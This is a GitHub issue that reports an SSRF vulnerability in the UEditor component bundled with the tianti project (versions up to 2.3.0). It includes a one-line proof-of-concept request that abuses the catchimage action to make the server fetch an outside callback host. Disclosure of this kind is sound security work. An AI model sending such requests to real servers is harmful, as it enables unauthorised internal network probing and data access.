tianti icon indicating copy to clipboard operation
tianti copied to clipboard

SSRF vulnerability

Open NinjaGPT opened this issue 5 months ago • 0 comments

Summary

UEditor has an SSRF vulnerability, and this project is using the vulnerable version in <=2.3.0.

POC

http://127.0.0.1:8080/tianti-module-admin/ueditor/controller.jsp?action=catchimage&source%5b%5d=http://d46ee8bf07.ipv6.bypass.eu.org
Image

NinjaGPT avatar Aug 04 '25 03:08 NinjaGPT